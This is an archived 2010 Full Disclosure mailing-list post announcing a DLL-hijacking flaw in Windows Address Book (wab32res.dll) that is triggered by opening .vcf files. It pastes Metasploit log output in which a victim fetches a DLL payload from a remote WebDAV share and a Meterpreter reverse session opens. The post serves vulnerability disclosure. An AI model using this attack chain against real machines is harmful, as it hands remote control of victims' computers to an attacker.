Full Disclosure mailing list archives
DLL hijacking (Windows Address Book - wab32res.dll)
From: matt <matt () attackvector org>
Date: Tue, 24 Aug 2010 13:57:42 -0500
For those interested, I just discovered that the Windows Address Book is vulnerable to DLL hijacking when opening .vcf (and probably other) file types. http://www.attackvector.org/new-dll-hijacking-exploits-many/ [..snip..] [*] 10.0.0.252:1137 PROPFIND /hacku/wab32res.dll [*] 10.0.0.252:1137 PROPFIND => 207 File (/hacku/wab32res.dll) [*] 10.0.0.252:1133 GET => DLL Payload [*] 10.0.0.252:1137 PROPFIND /hacku/rundll32.exe [*] 10.0.0.252:1137 PROPFIND => 404 (/hacku/rundll32.exe) [*] 10.0.0.252:1133 GET => DATA (/hacku/owned.vcf) [*] Sending stage (748544 bytes) to 10.0.0.252 [*] Meterpreter session 4 opened (1.2.3.4:31337 -> 10.0.0.252:1155) at Tue Aug 24 13:49:02 -0500 2010
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
- DLL hijacking (Windows Address Book - wab32res.dll) matt (Aug 24)
- Re: DLL hijacking (Windows Address Book -wab32res.dll) Sherwyn (Aug 24)